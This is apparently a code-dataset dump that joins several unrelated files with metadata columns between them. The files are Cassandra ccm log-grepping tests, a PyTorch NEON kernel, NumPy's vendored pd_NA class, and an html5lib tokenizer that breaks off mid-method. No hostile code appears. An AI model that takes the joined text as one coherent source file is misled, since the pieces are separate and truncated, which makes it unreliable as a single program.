'Uptime (seconds) : 526\n'
'Heap Memory (MB) : 222.83 / 495.00\n'
'Off Heap Memory (MB) : 1.16\n'
'Data Center : dc1\n'
'Rack : r1\n'
'Exceptions : 0\n'
'Key Cache : entries 41, size 3.16 KB, capacity 24 MB, 19 hits, 59 requests, 0.322 recent hit rate, 14400 save period in seconds\n'
'Row Cache : entries 0, size 0 bytes, capacity 0 bytes, 0 hits, 0 requests, NaN recent hit rate, 0 save period in seconds\n'
'Counter Cache : entries 0, size 0 bytes, capacity 12 MB, 0 hits, 0 requests, NaN recent hit rate, 7200 save period in seconds\n'
'Token : -9223372036854775808\n')
self.assertEqual(ccmlib.node._get_load_from_info_output(data),
247.59 * 1024)
class TestErrorLogGrepping(ccmtest.Tester):
def assertGreppedLog(self, log, grepped_log):
self.assertEqual(ccmlib.node._grep_log_for_errors(log), grepped_log)
def test_basic_error_message(self):
err = 'ERROR: You messed up'
self.assertGreppedLog(err, [[err]])
def test_error_message_with_timestamp(self):
err = '2015-05-12 14:12:12,720 ERROR: You messed up'
self.assertGreppedLog(err, [[err]])
def test_filter_debug_lines(self):
err = 'DEBUG: harmless warning message\n'
self.assertGreppedLog(err, [])
def test_ignore_empty_lines(self):
err = ('\n'
'ERROR: Node unavailable')
self.assertGreppedLog(err, [['ERROR: Node unavailable']])
def test_ignore_debug_lines_containing_error(self):
err = 'DEBUG: another process raised: ERROR: abandon hope!\n'
self.assertGreppedLog(err, [])
def test_coalesces_stack_trace_lines(self):
err = ('ERROR: You have made a terrible mistake\n'
' And here are more details on what you did\n'
'saints preserve us')
self.assertGreppedLog(err,
[['ERROR: You have made a terrible mistake',
' And here are more details on what you did',
'saints preserve us']])
def test_multiple_errors(self):
err = ('ERROR: You have made a terrible mistake\n'
' And here are more details on what you did\n'
'INFO: Node joined ring\n'
'ERROR: not again!')
self.assertGreppedLog(err,
[['ERROR: You have made a terrible mistake',
' And here are more details on what you did'],
['ERROR: not again!']])
def test_consecutive_errors(self):
err = ('ERROR: You have made a terrible mistake\n'
' And here are more details on what you did\n'
'INFO: Node joined ring\n'
'ERROR: not again!\n'
' And, yup, here is some more details\n'
'ERROR: ugh, and a third one!')
self.assertGreppedLog(err,
[['ERROR: You have made a terrible mistake',
' And here are more details on what you did'],
['ERROR: not again!',
' And, yup, here is some more details'],
['ERROR: ugh, and a third one!']])
def test_does_not_coalesce_info_lines(self):
err = ('ERROR: You have made a terrible mistake\n'
' 2015-05-12 14:12:12,720 INFO: why would you ever do that\n')
self.assertGreppedLog(err, [['ERROR: You have made a terrible mistake']])
def test_finds_exceptions_logged_as_warn(self):
line1 = ('WARN [ReadStage-2] 2017-03-20 13:29:39,165 AbstractLocalAwareExecutorService.java:167 - '
'Uncaught exception on thread Thread[ReadStage-2,5,main]: {} java.lang.AssertionError: Lower bound '
'[INCL_START_BOUND(HistLoss, -9223372036854775808, -9223372036854775808) ]is bigger than '
'first returned value')
line2 = ('WARN [MessagingService-Incoming-/IP] 2017-05-26 19:27:11,523 IncomingTcpConnection.java:101 - '
'UnknownColumnFamilyException reading from socket; closing org.apache.cassandra.db.'
'UnknownColumnFamilyException: Couldnt find table for cfId 922b7940-3a65-11e7-adf3-a3ff55d9bcf1. '
'If a table was just created, this is likely due to the schema not being fully propagated. '
'Please wait for schema agreement on table creation.')
line3 = 'WARN oh no there was an error, it failed, with a failure' # dont care for this one
line4 = 'WARN there was an exception!!!'
err = '\n'.join([line1, line2, line3, line4])
self.assertGreppedLog(err, [[line1], [line2], [line4]]) | unknown | codeparrot/codeparrot-clean | ||
/*
* Copyright (c) Facebook, Inc. and its affiliates.
* All rights reserved.
*
* This source code is licensed under the BSD-style license found in the
* LICENSE file in the root directory of this source tree.
*/
#include <assert.h>
#include <arm_neon.h>
#include <qnnpack/u8rmax.h>
uint8_t pytorch_u8rmax_ukernel__neon(size_t n, const uint8_t* x) {
assert(n != 0);
if
PYTORCH_QNNP_LIKELY(n >= 16) {
uint8x16_t vmax = vmovq_n_u8(0);
do {
const uint8x16_t vx = vld1q_u8(x);
x += 16;
vmax = vmaxq_u8(vmax, vx);
n -= 16;
} while (n >= 16);
if (n != 0) {
const size_t x_increment = n - 16;
x = (const uint8_t*)((uintptr_t)x + x_increment);
const uint8x16_t vx = vld1q_u8(x);
vmax = vmaxq_u8(vmax, vx);
}
uint8x8_t vmax8 = vmax_u8(vget_low_u8(vmax), vget_high_u8(vmax));
const uint8x8_t vmax4 = vpmax_u8(vmax8, vmax8);
const uint8x8_t vmax2 = vpmax_u8(vmax4, vmax4);
const uint8x8_t vmax1 = vpmax_u8(vmax2, vmax2);
return vget_lane_u8(vmax1, 0);
}
else {
uint8x8_t vmax = vmov_n_u8(0);
do {
const uint8x8_t vx = vld1_dup_u8(x);
x += 1;
vmax = vmax_u8(vmax, vx);
} while (--n != 0);
return vget_lane_u8(vmax, 0);
}
} | c | github | https://github.com/pytorch/pytorch | aten/src/ATen/native/quantized/cpu/qnnpack/src/u8rmax/neon.c |
# Vendored implementation of pandas.NA, adapted from pandas/_libs/missing.pyx
#
# This is vendored to avoid adding pandas as a test dependency.
__all__ = ["pd_NA"]
import numbers
import numpy as np
def _create_binary_propagating_op(name, is_divmod=False):
is_cmp = name.strip("_") in ["eq", "ne", "le", "lt", "ge", "gt"]
def method(self, other):
if (
other is pd_NA
or isinstance(other, (str, bytes, numbers.Number, np.bool))
or (isinstance(other, np.ndarray) and not other.shape)
):
# Need the other.shape clause to handle NumPy scalars,
# since we do a setitem on `out` below, which
# won't work for NumPy scalars.
if is_divmod:
return pd_NA, pd_NA
else:
return pd_NA
elif isinstance(other, np.ndarray):
out = np.empty(other.shape, dtype=object)
out[:] = pd_NA
if is_divmod:
return out, out.copy()
else:
return out
elif is_cmp and isinstance(other, (np.datetime64, np.timedelta64)):
return pd_NA
elif isinstance(other, np.datetime64):
if name in ["__sub__", "__rsub__"]:
return pd_NA
elif isinstance(other, np.timedelta64):
if name in ["__sub__", "__rsub__", "__add__", "__radd__"]:
return pd_NA
return NotImplemented
method.__name__ = name
return method
def _create_unary_propagating_op(name: str):
def method(self):
return pd_NA
method.__name__ = name
return method
class NAType:
def __repr__(self) -> str:
return "<NA>"
def __format__(self, format_spec) -> str:
try:
return self.__repr__().__format__(format_spec)
except ValueError:
return self.__repr__()
def __bool__(self):
raise TypeError("boolean value of NA is ambiguous")
def __hash__(self):
return 2**61 - 1
def __reduce__(self):
return "pd_NA"
# Binary arithmetic and comparison ops -> propagate
__add__ = _create_binary_propagating_op("__add__")
__radd__ = _create_binary_propagating_op("__radd__")
__sub__ = _create_binary_propagating_op("__sub__")
__rsub__ = _create_binary_propagating_op("__rsub__")
__mul__ = _create_binary_propagating_op("__mul__")
__rmul__ = _create_binary_propagating_op("__rmul__")
__matmul__ = _create_binary_propagating_op("__matmul__")
__rmatmul__ = _create_binary_propagating_op("__rmatmul__")
__truediv__ = _create_binary_propagating_op("__truediv__")
__rtruediv__ = _create_binary_propagating_op("__rtruediv__")
__floordiv__ = _create_binary_propagating_op("__floordiv__")
__rfloordiv__ = _create_binary_propagating_op("__rfloordiv__")
__mod__ = _create_binary_propagating_op("__mod__")
__rmod__ = _create_binary_propagating_op("__rmod__")
__divmod__ = _create_binary_propagating_op("__divmod__", is_divmod=True)
__rdivmod__ = _create_binary_propagating_op("__rdivmod__", is_divmod=True)
# __lshift__ and __rshift__ are not implemented
__eq__ = _create_binary_propagating_op("__eq__")
__ne__ = _create_binary_propagating_op("__ne__")
__le__ = _create_binary_propagating_op("__le__")
__lt__ = _create_binary_propagating_op("__lt__")
__gt__ = _create_binary_propagating_op("__gt__")
__ge__ = _create_binary_propagating_op("__ge__")
# Unary ops
__neg__ = _create_unary_propagating_op("__neg__")
__pos__ = _create_unary_propagating_op("__pos__")
__abs__ = _create_unary_propagating_op("__abs__")
__invert__ = _create_unary_propagating_op("__invert__")
# Logical ops using Kleene logic
def __and__(self, other):
if other is False:
return False
elif other is True or other is pd_NA:
return pd_NA
return NotImplemented
__rand__ = __and__
def __or__(self, other):
if other is True:
return True
elif other is False or other is pd_NA:
return pd_NA
return NotImplemented
__ror__ = __or__
def __xor__(self, other):
if other is False or other is True or other is pd_NA:
return pd_NA
return NotImplemented
__rxor__ = __xor__
pd_NA = NAType() | python | github | https://github.com/numpy/numpy | numpy/_core/tests/_natype.py |
try:
frozenset
except NameError:
# Import from the sets module for python 2.3
from sets import Set as set
from sets import ImmutableSet as frozenset
try:
from collections import deque
except ImportError:
from utils import deque
from constants import contentModelFlags, spaceCharacters
from constants import entitiesWindows1252, entities
from constants import asciiLowercase, asciiLetters, asciiUpper2Lower
from constants import digits, hexDigits, EOF
from constants import tokenTypes, tagTokenTypes
from inputstream import HTMLInputStream
# Group entities by their first character, for faster lookups
entitiesByFirstChar = {}
for e in entities:
entitiesByFirstChar.setdefault(e[0], []).append(e)
class HTMLTokenizer:
""" This class takes care of tokenizing HTML.
* self.currentToken
Holds the token that is currently being processed.
* self.state
Holds a reference to the method to be invoked... XXX
* self.states
Holds a mapping between states and methods that implement the state.
* self.stream
Points to HTMLInputStream object.
"""
# XXX need to fix documentation
def __init__(self, stream, encoding=None, parseMeta=True, useChardet=True,
lowercaseElementName=True, lowercaseAttrName=True):
self.stream = HTMLInputStream(stream, encoding, parseMeta, useChardet)
#Perform case conversions?
self.lowercaseElementName = lowercaseElementName
self.lowercaseAttrName = lowercaseAttrName
self.states = {
"data":self.dataState,
"entityData":self.entityDataState,
"tagOpen":self.tagOpenState,
"closeTagOpen":self.closeTagOpenState,
"tagName":self.tagNameState,
"beforeAttributeName":self.beforeAttributeNameState,
"attributeName":self.attributeNameState,
"afterAttributeName":self.afterAttributeNameState,
"beforeAttributeValue":self.beforeAttributeValueState,
"attributeValueDoubleQuoted":self.attributeValueDoubleQuotedState,
"attributeValueSingleQuoted":self.attributeValueSingleQuotedState,
"attributeValueUnQuoted":self.attributeValueUnQuotedState,
"afterAttributeValue":self.afterAttributeValueState,
"selfClosingStartTag":self.selfClosingStartTagState,
"bogusComment":self.bogusCommentState,
"bogusCommentContinuation":self.bogusCommentContinuationState,
"markupDeclarationOpen":self.markupDeclarationOpenState,
"commentStart":self.commentStartState,
"commentStartDash":self.commentStartDashState,
"comment":self.commentState,
"commentEndDash":self.commentEndDashState,
"commentEnd":self.commentEndState,
"commentEndBang":self.commentEndBangState,
"commentEndSpace":self.commentEndSpaceState,
"doctype":self.doctypeState,
"beforeDoctypeName":self.beforeDoctypeNameState,
"doctypeName":self.doctypeNameState,
"afterDoctypeName":self.afterDoctypeNameState,
"beforeDoctypePublicIdentifier":self.beforeDoctypePublicIdentifierState,
"doctypePublicIdentifierDoubleQuoted":self.doctypePublicIdentifierDoubleQuotedState,
"doctypePublicIdentifierSingleQuoted":self.doctypePublicIdentifierSingleQuotedState,
"afterDoctypePublicIdentifier":self.afterDoctypePublicIdentifierState,
"beforeDoctypeSystemIdentifier":self.beforeDoctypeSystemIdentifierState,
"doctypeSystemIdentifierDoubleQuoted":self.doctypeSystemIdentifierDoubleQuotedState,
"doctypeSystemIdentifierSingleQuoted":self.doctypeSystemIdentifierSingleQuotedState,
"afterDoctypeSystemIdentifier":self.afterDoctypeSystemIdentifierState,
"bogusDoctype":self.bogusDoctypeState
}
# Setup the initial tokenizer state
self.contentModelFlag = contentModelFlags["PCDATA"]
self.escapeFlag = False
self.lastFourChars = []
self.state = self.dataState
self.escape = False
# The current token being created
self.currentToken = None
def __iter__(self):
""" This is where the magic happens.
We do our usually processing through the states and when we have a token
to return we yield the token which pauses processing until the next token
is requested.
"""
self.tokenQueue = deque([])
# Start processing. When EOF is reached self.state will return False
# instead of True and the loop will terminate.
while self.state():
while self.stream.errors:
yield {"type": tokenTypes["ParseError"], "data": self.stream.errors.pop(0)}
while self.tokenQueue:
yield self.tokenQueue.popleft()
def consumeNumberEntity(self, isHex):
"""This function returns either U+FFFD or the character based on the
decimal or hexadecimal representation. It also discards ";" if present.
If not present self.tokenQueue.append({"type": tokenTypes["ParseError"]}) is invoked.
"""
allowed = digits
radix = 10
if isHex:
allowed = hexDigits
radix = 16
charStack = []
# Consume all the characters that are in range while making sure we
# don't hit an EOF.
c = self.stream.char()
while c in allowed and c is not EOF:
charStack.append(c)
c = self.stream.char()
# Convert the set of characters consumed to an int.
charAsInt = int("".join(charStack), radix)
if charAsInt == 13:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"incorrect-cr-newline-entity"})
charAsInt = 10
elif 127 < charAsInt < 160:
# If the integer is between 127 and 160 (so 128 and bigger and 159
# and smaller) we need to do the "windows trick".
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"illegal-windows-1252-entity"})
charAsInt = entitiesWindows1252[charAsInt - 128]
# Certain characters get replaced with U+FFFD
if ((charAsInt <= 0x0008) or (charAsInt == 0x000B) or (0x000E <= charAsInt <= 0x001F)
or (0x007F <= charAsInt <= 0x009F)
or (0xD800 <= charAsInt <= 0xDFFF) or (0xFDD0 <= charAsInt <= 0xFDEF)
or (charAsInt & 0xFFFE == 0xFFFE) # catch all U+?FFFE and U+?FFFF, where ? is 0..10
or (0x10FFFF < charAsInt)):
char = u"\uFFFD"
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"illegal-codepoint-for-numeric-entity",
"datavars": {"charAsInt": charAsInt}})
else:
try:
# XXX We should have a separate function that does "int" to
# "unicodestring" conversion since this doesn't always work
# according to hsivonen. Also, unichr has a limitation of 65535
char = unichr(charAsInt)
except:
try:
char = eval("u'\\U%08x'" % charAsInt)
except:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"cant-convert-numeric-entity",
"datavars": {"charAsInt": charAsInt}})
# Discard the ; if present. Otherwise, put it back on the queue and
# invoke parseError on parser.
if c != u";":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"numeric-entity-without-semicolon"})
self.stream.unget(c)
return char
def consumeEntity(self, allowedChar=None, fromAttribute=False):
# Initialise to the default output for when no entity is matched
output = u"&"
charStack = [self.stream.char()]
if charStack[0] in spaceCharacters or charStack[0] in (EOF, u"<", u"&") \
or (allowedChar is not None and allowedChar == charStack[0]):
self.stream.unget(charStack[0])
elif charStack[0] == u"#":
# Read the next character to see if it's hex or decimal
hex = False
charStack.append(self.stream.char())
if charStack[-1] in (u"x", u"X"):
hex = True
charStack.append(self.stream.char())
# charStack[-1] should be the first digit
if (hex and charStack[-1] in hexDigits) \
or (not hex and charStack[-1] in digits):
# At least one digit found, so consume the whole number
self.stream.unget(charStack[-1])
output = self.consumeNumberEntity(hex)
else:
# No digits found
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data": "expected-numeric-entity"})
self.stream.unget(charStack.pop())
output = u"&" + u"".join(charStack)
else:
# At this point in the process might have named entity. Entities
# are stored in the global variable "entities".
#
# Consume characters and compare to these to a substring of the
# entity names in the list until the substring no longer matches.
filteredEntityList = entitiesByFirstChar.get(charStack[0], [])
def entitiesStartingWith(name):
return [e for e in filteredEntityList if e.startswith(name)]
while charStack[-1] is not EOF and\
entitiesStartingWith("".join(charStack)):
charStack.append(self.stream.char())
# At this point we have a string that starts with some characters
# that may match an entity
entityName = None
# Try to find the longest entity the string will match to take care
# of ¬i for instance.
for entityLength in xrange(len(charStack)-1, 1, -1):
possibleEntityName = "".join(charStack[:entityLength])
if possibleEntityName in entities:
entityName = possibleEntityName
break
if entityName is not None:
if entityName[-1] != ";":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"named-entity-without-semicolon"})
if entityName[-1] != ";" and fromAttribute and \
(charStack[entityLength] in asciiLetters
or charStack[entityLength] in digits):
self.stream.unget(charStack.pop())
output = u"&" + u"".join(charStack)
else:
output = entities[entityName]
self.stream.unget(charStack.pop())
output += u"".join(charStack[entityLength:])
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-named-entity"})
self.stream.unget(charStack.pop())
output = u"&" + u"".join(charStack)
if fromAttribute:
self.currentToken["data"][-1][1] += output
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": output})
def processEntityInAttribute(self, allowedChar):
"""This method replaces the need for "entityInAttributeValueState".
"""
self.consumeEntity(allowedChar=allowedChar, fromAttribute=True)
def emitCurrentToken(self):
"""This method is a generic handler for emitting the tags. It also sets
the state to "data" because that's what's needed after a token has been
emitted.
"""
token = self.currentToken
# Add token to the queue to be yielded
if (token["type"] in tagTokenTypes):
if self.lowercaseElementName:
token["name"] = token["name"].translate(asciiUpper2Lower)
if token["type"] == tokenTypes["EndTag"]:
if token["data"]:
self.tokenQueue.append({"type":tokenTypes["ParseError"],
"data":"attributes-in-end-tag"})
if token["selfClosing"]:
self.tokenQueue.append({"type":tokenTypes["ParseError"],
"data":"self-closing-flag-on-end-tag"})
self.tokenQueue.append(token)
self.state = self.dataState
# Below are the various tokenizer states worked out.
def dataState(self):
#XXX - consider splitting this state based on the content model flag
data = self.stream.char()
# Keep a charbuffer to handle the escapeFlag
if (self.contentModelFlag in
(contentModelFlags["CDATA"], contentModelFlags["RCDATA"])):
if len(self.lastFourChars) == 4:
self.lastFourChars.pop(0)
self.lastFourChars.append(data)
# The rest of the logic
if (data == "&" and self.contentModelFlag in
(contentModelFlags["PCDATA"], contentModelFlags["RCDATA"]) and
not self.escapeFlag):
self.state = self.states["entityData"]
elif (data == "-" and self.contentModelFlag in
(contentModelFlags["CDATA"], contentModelFlags["RCDATA"]) and
not self.escapeFlag and "".join(self.lastFourChars) == "<!--"):
self.escapeFlag = True
self.tokenQueue.append({"type": tokenTypes["Characters"],
"data":data})
elif (data == "<" and (self.contentModelFlag ==
contentModelFlags["PCDATA"]
or (self.contentModelFlag in
(contentModelFlags["CDATA"],
contentModelFlags["RCDATA"]) and
self.escapeFlag == False))):
self.state = self.states["tagOpen"]
elif (data == ">" and self.contentModelFlag in
(contentModelFlags["CDATA"], contentModelFlags["RCDATA"]) and
self.escapeFlag and "".join(self.lastFourChars)[1:] == "-->"):
self.escapeFlag = False
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":data})
elif data is EOF:
# Tokenization ends.
return False
elif data in spaceCharacters:
# Directly after emitting a token you switch back to the "data
# state". At that point spaceCharacters are important so they are
# emitted separately.
self.tokenQueue.append({"type": tokenTypes["SpaceCharacters"], "data":
data + self.stream.charsUntil(spaceCharacters, True)})
# No need to update lastFourChars here, since the first space will
# have already been appended to lastFourChars and will have broken
# any <!-- or --> sequences
else:
if (self.contentModelFlag in
(contentModelFlags["CDATA"], contentModelFlags["RCDATA"])):
chars = self.stream.charsUntil((u"&", u"<", u">", u"-"))
self.lastFourChars += chars[-4:]
self.lastFourChars = self.lastFourChars[-4:]
else:
chars = self.stream.charsUntil((u"&", u"<"))
self.tokenQueue.append({"type": tokenTypes["Characters"], "data":
data + chars})
return True
def entityDataState(self):
self.consumeEntity()
self.state = self.states["data"]
return True
def tagOpenState(self):
data = self.stream.char()
if self.contentModelFlag == contentModelFlags["PCDATA"]:
if data == u"!":
self.state = self.states["markupDeclarationOpen"]
elif data == u"/":
self.state = self.states["closeTagOpen"]
elif data in asciiLetters:
self.currentToken = {"type": tokenTypes["StartTag"],
"name": data, "data": [],
"selfClosing": False,
"selfClosingAcknowledged": False}
self.state = self.states["tagName"]
elif data == u">":
# XXX In theory it could be something besides a tag name. But
# do we really care?
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-tag-name-but-got-right-bracket"})
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": u"<>"})
self.state = self.states["data"]
elif data == u"?":
# XXX In theory it could be something besides a tag name. But
# do we really care?
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-tag-name-but-got-question-mark"})
self.stream.unget(data)
self.state = self.states["bogusComment"]
else:
# XXX
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-tag-name"})
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": u"<"})
self.stream.unget(data)
self.state = self.states["data"]
else:
# We know the content model flag is set to either RCDATA or CDATA
# now because this state can never be entered with the PLAINTEXT
# flag.
if data == u"/":
self.state = self.states["closeTagOpen"]
else:
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": u"<"})
self.stream.unget(data)
self.state = self.states["data"]
return True
def closeTagOpenState(self):
if (self.contentModelFlag in (contentModelFlags["RCDATA"],
contentModelFlags["CDATA"])):
charStack = []
if self.currentToken:
# So far we know that "</" has been consumed. We now need to know
# whether the next few characters match the name of last emitted
# start tag which also happens to be the currentToken.
matched = True
for expected in self.currentToken["name"].lower():
charStack.append(self.stream.char())
if charStack[-1] not in (expected, expected.upper()):
matched = False
break
# If the tag name prefix matched, we also need to check the
# subsequent character
if matched:
charStack.append(self.stream.char())
if charStack[-1] in (spaceCharacters | frozenset((u">", u"/", EOF))):
self.contentModelFlag = contentModelFlags["PCDATA"]
# Unget the last character, so it can be re-processed
# in the next state
self.stream.unget(charStack.pop())
# The remaining characters in charStack are the tag name
self.currentToken = {"type": tokenTypes["EndTag"],
"name": u"".join(charStack),
"data": [],
"selfClosing":False}
self.state = self.states["tagName"]
return True
# Didn't find the end tag. The last character in charStack could be
# anything, so it has to be re-processed in the data state
self.stream.unget(charStack.pop())
# The remaining characters are a prefix of the tag name, so they're
# just letters and digits, so they can be output as character
# tokens immediately
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": u"</" + u"".join(charStack)})
self.state = self.states["data"]
return True
data = self.stream.char()
if data in asciiLetters:
self.currentToken = {"type": tokenTypes["EndTag"], "name": data,
"data": [], "selfClosing":False}
self.state = self.states["tagName"]
elif data == u">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-closing-tag-but-got-right-bracket"})
self.state = self.states["data"]
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-closing-tag-but-got-eof"})
self.tokenQueue.append({"type": tokenTypes["Characters"], "data": u"</"})
self.state = self.states["data"]
else:
# XXX data can be _'_...
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-closing-tag-but-got-char",
"datavars": {"data": data}})
self.stream.unget(data)
self.state = self.states["bogusComment"]
return True
def tagNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.states["beforeAttributeName"]
elif data == u">":
self.emitCurrentToken()
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-tag-name"})
self.state = self.states["data"]
elif data == u"/":
self.state = self.states["selfClosingStartTag"]
else:
self.currentToken["name"] += data
# (Don't use charsUntil here, because tag names are
# very short and it's faster to not do anything fancy)
return True
def beforeAttributeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.stream.charsUntil(spaceCharacters, True)
elif data in asciiLetters:
self.currentToken["data"].append([data, ""])
self.state = self.states["attributeName"]
elif data == u">":
self.emitCurrentToken()
elif data == u"/":
self.state = self.states["selfClosingStartTag"]
elif data == u"'" or data == u'"' or data == u"=":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"invalid-character-in-attribute-name"})
self.currentToken["data"].append([data, ""])
self.state = self.states["attributeName"]
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-attribute-name-but-got-eof"})
self.state = self.states["data"]
else:
self.currentToken["data"].append([data, ""])
self.state = self.states["attributeName"]
return True
def attributeNameState(self):
data = self.stream.char()
leavingThisState = True
emitToken = False
if data == u"=":
self.state = self.states["beforeAttributeValue"]
elif data in asciiLetters:
self.currentToken["data"][-1][0] += data +\
self.stream.charsUntil(asciiLetters, True)
leavingThisState = False
elif data == u">":
# XXX If we emit here the attributes are converted to a dict
# without being checked and when the code below runs we error
# because data is a dict not a list
emitToken = True
elif data in spaceCharacters:
self.state = self.states["afterAttributeName"]
elif data == u"/":
self.state = self.states["selfClosingStartTag"]
elif data == u"'" or data == u'"':
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"invalid-character-in-attribute-name"})
self.currentToken["data"][-1][0] += data
leavingThisState = False
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-attribute-name"})
self.state = self.states["data"]
emitToken = True
else:
self.currentToken["data"][-1][0] += data
leavingThisState = False
if leavingThisState:
# Attributes are not dropped at this stage. That happens when the
# start tag token is emitted so values can still be safely appended
# to attributes, but we do want to report the parse error in time.
if self.lowercaseAttrName:
self.currentToken["data"][-1][0] = (
self.currentToken["data"][-1][0].translate(asciiUpper2Lower))
for name, value in self.currentToken["data"][:-1]:
if self.currentToken["data"][-1][0] == name:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"duplicate-attribute"})
break
# XXX Fix for above XXX
if emitToken:
self.emitCurrentToken()
return True
def afterAttributeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.stream.charsUntil(spaceCharacters, True)
elif data == u"=":
self.state = self.states["beforeAttributeValue"]
elif data == u">":
self.emitCurrentToken()
elif data in asciiLetters:
self.currentToken["data"].append([data, ""])
self.state = self.states["attributeName"]
elif data == u"/":
self.state = self.states["selfClosingStartTag"]
elif data == u"'" or data == u'"':
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"invalid-character-after-attribute-name"})
self.currentToken["data"].append([data, ""])
self.state = self.states["attributeName"]
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-end-of-tag-but-got-eof"})
self.emitCurrentToken()
else:
self.currentToken["data"].append([data, ""])
self.state = self.states["attributeName"]
return True
def beforeAttributeValueState(self):
data = self.stream.char()
if data in spaceCharacters:
self.stream.charsUntil(spaceCharacters, True)
elif data == u"\"":
self.state = self.states["attributeValueDoubleQuoted"]
elif data == u"&":
self.state = self.states["attributeValueUnQuoted"]
self.stream.unget(data);
elif data == u"'":
self.state = self.states["attributeValueSingleQuoted"]
elif data == u">":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-attribute-value-but-got-right-bracket"})
self.emitCurrentToken()
elif data == u"=":
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"equals-in-unquoted-attribute-value"})
self.currentToken["data"][-1][1] += data
self.state = self.states["attributeValueUnQuoted"]
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"expected-attribute-value-but-got-eof"})
self.emitCurrentToken()
else:
self.currentToken["data"][-1][1] += data
self.state = self.states["attributeValueUnQuoted"]
return True
def attributeValueDoubleQuotedState(self):
data = self.stream.char()
if data == "\"":
self.state = self.states["afterAttributeValue"]
elif data == u"&":
self.processEntityInAttribute(u'"')
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-attribute-value-double-quote"})
self.emitCurrentToken()
else:
self.currentToken["data"][-1][1] += data +\
self.stream.charsUntil(("\"", u"&"))
return True
def attributeValueSingleQuotedState(self):
data = self.stream.char()
if data == "'":
self.state = self.states["afterAttributeValue"]
elif data == u"&":
self.processEntityInAttribute(u"'")
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-attribute-value-single-quote"})
self.emitCurrentToken()
else:
self.currentToken["data"][-1][1] += data +\
self.stream.charsUntil(("'", u"&"))
return True
def attributeValueUnQuotedState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.states["beforeAttributeName"]
elif data == u"&":
self.processEntityInAttribute(None)
elif data == u">":
self.emitCurrentToken()
elif data in (u'"', u"'", u"=", u"<"):
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-character-in-unquoted-attribute-value"})
self.currentToken["data"][-1][1] += data
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"eof-in-attribute-value-no-quotes"})
self.emitCurrentToken()
else:
self.currentToken["data"][-1][1] += data + self.stream.charsUntil( \
frozenset(("&", ">", "<", "=", "'", '"')) | spaceCharacters)
return True
def afterAttributeValueState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.states["beforeAttributeName"]
elif data == u">":
self.emitCurrentToken()
elif data == u"/":
self.state = self.states["selfClosingStartTag"]
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-EOF-after-attribute-value"})
self.emitCurrentToken()
self.stream.unget(data)
self.state = self.states["data"]
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-character-after-attribute-value"})
self.stream.unget(data)
self.state = self.states["beforeAttributeName"]
return True
def selfClosingStartTagState(self):
data = self.stream.char()
if data == ">":
self.currentToken["selfClosing"] = True
self.emitCurrentToken()
elif data is EOF:
self.tokenQueue.append({"type": tokenTypes["ParseError"],
"data":
"unexpected-EOF-after-solidus-in-tag"})
self.stream.unget(data)
self.state = self.states["data"]
else:
self.tokenQueue.append({"type": tokenTypes["ParseError"], "data":
"unexpected-character-after-soldius-in-tag"})
self.stream.unget(data)
self.state = self.states["beforeAttributeName"]
return True
def bogusCommentState(self):
# Make a new comment token and give it as value all the characters
# until the first > or EOF (charsUntil checks for EOF automatically)
# and emit it.
self.tokenQueue.append(
{"type": tokenTypes["Comment"], "data": self.stream.charsUntil(u">")})
# Eat the character directly after the bogus comment which is either a
# ">" or an EOF.
self.stream.char()
self.state = self.states["data"]
return True
def bogusCommentContinuationState(self):
# Like bogusCommentState, but the caller must create the comment token
# and this state just adds more characters to it
self.currentToken["data"] += self.stream.charsUntil(u">")
self.tokenQueue.append(self.currentToken)
# Eat the character directly after the bogus comment which is either a
# ">" or an EOF.
self.stream.char()
self.state = self.states["data"]
return True
def markupDeclarationOpenState(self):
charStack = [self.stream.char()]
if charStack[-1] == u"-":
charStack.append(self.stream.char())
if charStack[-1] == u"-":
self.currentToken = {"type": tokenTypes["Comment"], "data": u""}
self.state = self.states["commentStart"]
return True
